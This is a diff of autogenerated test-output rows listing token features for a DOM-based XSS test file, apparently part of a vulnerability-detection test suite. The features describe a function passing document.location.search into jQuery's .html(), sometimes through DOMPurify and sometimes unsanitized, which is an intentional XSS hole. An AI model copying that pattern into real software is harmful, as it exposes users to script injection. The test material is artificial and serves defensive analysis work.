autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | 'arguments' object of function test | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | 'arguments' object of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | 'arguments' object of function test | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | 'arguments' object of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | 'arguments' object of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | exceptional return of function test | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | exceptional return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | exceptional return of function test | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | exceptional return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | exceptional return of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | functio ... K\\n }\\n} | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | functio ... K\\n }\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | functio ... K\\n }\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | return of function test | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | return of function test | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | return of function test | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | return of function test | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:1:23:1 | return of function test | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:10:1:13 | test | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:10:1:13 | test | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:1:10:1:13 | test | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:7:2:12 | target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:7:2:12 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:7:2:12 | target | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:7:2:12 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:7:2:12 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:7:2:39 | target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:7:2:39 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:7:2:39 | target | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:7:2:39 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:7:2:39 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:7:2:39 | target ... .search | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:7:2:39 | target ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:7:2:39 | target ... .search | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:7:2:39 | target ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:7:2:39 | target ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:16:2:23 | document | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:16:2:23 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:16:2:23 | document | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:16:2:23 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:16:2:23 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:16:2:32 | document.location | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:16:2:32 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:16:2:32 | document.location | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:16:2:32 | document.location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:16:2:32 | document.location | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:16:2:39 | documen ... .search | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:16:2:39 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:16:2:39 | documen ... .search | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:16:2:39 | documen ... .search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:16:2:39 | documen ... .search | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:25:2:32 | location | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:25:2:32 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:25:2:32 | location | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:25:2:32 | location | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:25:2:32 | location | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:34:2:39 | search | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:34:2:39 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:34:2:39 | search | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:34:2:39 | search | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:2:34:2:39 | search | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:3 | $ | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:3 | $ | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:11 | $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:11 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:11 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:11 | exceptional return of $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:11 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:11 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:16 | $('myId').html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:16 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:16 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:64 | $('myId ... target) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:64 | $('myId ... target) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:64 | $('myId ... target) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:64 | $('myId ... target) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:64 | $('myId ... target) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:64 | exceptional return of $('myId ... target) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:64 | exceptional return of $('myId ... target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:64 | exceptional return of $('myId ... target) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:64 | exceptional return of $('myId ... target) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:3:4:64 | exceptional return of $('myId ... target) | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:5:4:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:5:4:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:5:4:10 | 'myId' | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14380,6 +104518,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:5:4:10 | 'myId' | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:5:4:10 | 'myId' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:5:4:10 | 'myId' | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:13:4:16 | html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:13:4:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:13:4:16 | html | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:13:4:16 | html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:13:4:16 | html | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:18:4:25 | sanitize | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:18:4:25 | sanitize | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:18:4:25 | sanitize | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:18:4:25 | sanitize | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:18:4:25 | sanitize | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:18:4:63 | sanitiz ... target | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:18:4:63 | sanitiz ... target | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:18:4:63 | sanitiz ... target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | @@ -14387,6 +104535,66 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:18:4:63 | sanitiz ... target | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:18:4:63 | sanitiz ... target | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:18:4:63 | sanitiz ... target | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:37 | DOMPurify | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:37 | DOMPurify | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:37 | DOMPurify | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:37 | DOMPurify | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:37 | DOMPurify | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:46 | DOMPurify.sanitize | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:46 | DOMPurify.sanitize | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:46 | DOMPurify.sanitize | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:46 | DOMPurify.sanitize | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:46 | DOMPurify.sanitize | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:54 | DOMPuri ... target) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:54 | DOMPuri ... target) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:54 | DOMPuri ... target) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:54 | DOMPuri ... target) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:54 | DOMPuri ... target) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:54 | exceptional return of DOMPuri ... target) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:54 | exceptional return of DOMPuri ... target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:54 | exceptional return of DOMPuri ... target) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:54 | exceptional return of DOMPuri ... target) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:29:4:54 | exceptional return of DOMPuri ... target) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:39:4:46 | sanitize | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:39:4:46 | sanitize | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:39:4:46 | sanitize | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:39:4:46 | sanitize | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:39:4:46 | sanitize | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:58:4:63 | target | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:58:4:63 | target | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:58:4:63 | target | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:58:4:63 | target | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:4:58:4:63 | target | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:3 | $ | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:3 | $ | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:3 | $ | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:11 | $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:11 | $('myId') | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:11 | $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:11 | $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:11 | exceptional return of $('myId') | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:11 | exceptional return of $('myId') | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:11 | exceptional return of $('myId') | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:11 | exceptional return of $('myId') | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:16 | $('myId').html | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:16 | $('myId').html | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:16 | $('myId').html | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:16 | $('myId').html | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:24 | $('myId ... target) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:24 | $('myId ... target) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:24 | $('myId ... target) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:24 | $('myId ... target) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:24 | $('myId ... target) | fileImports | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:24 | exceptional return of $('myId ... target) | contextFunctionInterfaces | badSanitizer()\ninner(x)\nsanitizeBad(x)\ntest() | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:24 | exceptional return of $('myId ... target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:24 | exceptional return of $('myId ... target) | enclosingFunctionBody | target document location search $ myId html sanitize DOMPurify sanitize target target $ myId html target tainted target $ myId html tainted sanitize tainted DOMPurify sanitize tainted $ myId html tainted inner target inner x $ myId html x sanitize x DOMPurify sanitize x $ myId html x | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:24 | exceptional return of $('myId ... target) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:3:6:24 | exceptional return of $('myId ... target) | fileImports | | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:5:6:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/optionalSanitizer.js:6:5:6:10 | 'myId' | InputArgumentIndex | 0 | | 